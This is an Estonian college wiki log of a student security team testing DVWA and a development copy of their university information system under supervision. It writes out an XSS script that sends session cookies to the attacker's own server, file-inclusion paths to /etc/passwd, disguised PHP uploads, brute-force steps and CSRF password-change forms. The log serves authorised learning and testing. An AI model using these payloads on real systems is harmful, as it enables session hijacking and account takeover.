Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47047</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47047"/>
		<updated>2012-03-30T13:46:00Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* 1. päev - Materjalidega tutvumine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Meida:Insecure Cryptographic Storage.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Meida:Security Misconfiguration.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
